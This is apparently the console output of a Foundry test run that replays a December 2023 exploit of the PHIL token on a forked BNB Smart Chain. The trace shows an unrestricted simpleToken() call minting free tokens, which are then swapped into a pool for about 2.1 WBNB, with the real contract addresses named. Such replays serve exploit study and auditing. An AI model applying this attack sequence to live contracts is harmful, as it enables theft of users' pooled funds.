Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-12/PHIL_exp.sol:18:5:
   |
18 |     IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/PHIL_exp.sol:42:78:
   |
42 |     function pancakeV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata data) external {
   |                                                                              ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 435.20ms (1.86ms CPU time)

Ran 1 test for src/test/2023-12/PHIL_exp.sol:ContractTest
[PASS] testExploit() (gas: 206576)
Logs:
  Attacker WBNB balance before attack: 0.000000000000000000
  Attacker WBNB balance after attack: 2.098651734690958892

Traces:
  [9419] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 34345319 [3.434e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], "WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(PHIL: [0x4308D314096878D3bf16C9d8DB86101F70BBebF1], "PHIL")
    │   └─ ← [Return]
    └─ ← [Stop]

  [209376] ContractTest::testExploit()
    ├─ [2534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Attacker WBNB balance before attack", val: 0, decimals: 18)
    ├─ [26697] PHIL::simpleToken()
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 120000000000000000000000000 [1.2e26])
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000006342fd08f00f6378000000
    │   └─ ← [Stop]
    ├─ [155847] 0xb8b408A6BD3E43FCDE7D7AbC381ef10bcCcd5349::swap(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true, 21000000000000000000000 [2.1e22], 4295128740 [4.295e9], 0x61)
    │   ├─ [27962] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2098651734690958892 [2.098e18])
    │   │   ├─ emit Transfer(from: 0xb8b408A6BD3E43FCDE7D7AbC381ef10bcCcd5349, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2098651734690958892 [2.098e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x31527ac5092c30da4515b64915d3b0c9557cdd21a12db3e00675e7d4d8d718d7: 0x0000000000000000000000000000000000000000000000001e2025c54e98c980 → 0x00000000000000000000000000000000000000000000000001003d231d15bb54
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000001d1fe8a231830e2c
    │   │   └─ ← [Return] true
    │   ├─ [2635] PHIL::balanceOf(0xb8b408A6BD3E43FCDE7D7AbC381ef10bcCcd5349) [staticcall]
    │   │   └─ ← [Return] 1799535406211413623944985 [1.799e24]
    │   ├─ [8743] ContractTest::pancakeV3SwapCallback(21000000000000000000000 [2.1e22], -2098651734690958892 [-2.098e18], 0x61)
    │   │   ├─ [266] 0xb8b408A6BD3E43FCDE7D7AbC381ef10bcCcd5349::token0() [staticcall]
    │   │   │   └─ ← [Return] PHIL: [0x4308D314096878D3bf16C9d8DB86101F70BBebF1]
    │   │   ├─ [6221] PHIL::transfer(0xb8b408A6BD3E43FCDE7D7AbC381ef10bcCcd5349, 21000000000000000000000 [2.1e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb8b408A6BD3E43FCDE7D7AbC381ef10bcCcd5349, value: 21000000000000000000000 [2.1e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000006342fd08f00f6378000000 → 0x000000000000000000000000000000000000000000633e8a9f64ce2834e00000
    │   │   │   │   @ 0x4d802de8009a8892661f53029e190b46c3e755f0ff926629e39db1151d80b637: 0x000000000000000000000000000000000000000000017d11028522132d1fb719 → 0x0000000000000000000000000000000000000000000181836c10634e703fb719
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [635] PHIL::balanceOf(0xb8b408A6BD3E43FCDE7D7AbC381ef10bcCcd5349) [staticcall]
    │   │   └─ ← [Return] 1820535406211413623944985 [1.82e24]
    │   ├─ emit Swap(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 21000000000000000000000 [2.1e22], param3: -2098651734690958892 [-2.098e18], param4: 791833419678244374545150201 [7.918e26], param5: 212948203813306247371617 [2.129e23], param6: -92120 [-9.212e4], param7: 3570000000000000000 [3.57e18], param8: 0)
    │   ├─  storage changes:
    │   │   @ 0x388a9b00fcf0831451d9ab903c5e58d47468af1d9b383c888aa77fc4f83df12d: 0 → 0x0000000000000000000000000000000000007d141d8e5ce96f1eb0310fbed9f4
    │   │   @ 0: 0x000000000100010000fe98400000000000000000028fc546840a9f0ba2732ff1 → 0x000000000100010000fe98280000000000000000028efd3fb16e46cb1df7b0f9
    │   │   @ 0x388a9b00fcf0831451d9ab903c5e58d47468af1d9b383c888aa77fc4f83df12f: 0x01657adb4a00000000000000000000000011f55172843f3dfcfffffffdc560e2 → 0x01000005da00000000000000000000000184ee19d87075cdf9fffffff7c6e680
    │   │   @ 5: 0x0000000000000000000000000000000000000000000003da01ef4712fbffff1b → 0x000000000000000000000000000000000000000000002d17f1fc9043822f5b61
    │   │   @ 9: 0x0100000000000000000000000011f55172843f3dfcfffffffdc560e2657adb4a → 0x0100000000000000000000000196e36b4af4b50bf5fffffff58c4762657ae124
    │   │   @ 2: 0 → 0x0000000000000000000000000000000000029460d37211018e1c3260649b7cfa
    │   │   @ 4: 0x000000000000000000009a9d359c9fff00000000000000000000000000000000 → 0x000000000000000000009a9d359c9fff0000000000000000318b3015d8250000
    │   │   @ 0x388a9b00fcf0831451d9ab903c5e58d47468af1d9b383c888aa77fc4f83df12e: 0x000000000000000000000000000000000000000661cbe7434f7937694dcdc475 → 0x0000000000000000000000000000000000000003348e9a23e98e4ad61eea6acf
    │   └─ ← [Return] 21000000000000000000000 [2.1e22], -2098651734690958892 [-2.098e18]
    ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2098651734690958892 [2.098e18]
    ├─ emit log_named_decimal_uint(key: "Attacker WBNB balance after attack", val: 2098651734690958892 [2.098e18], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x000000000000000000000000000000000000000000000000000000000d480d48 → 0x000000000000000000000000000000000000000000000000000000010d480d48
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.16s (4.85s CPU time)

Ran 2 test suites in 6.18s (6.60s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
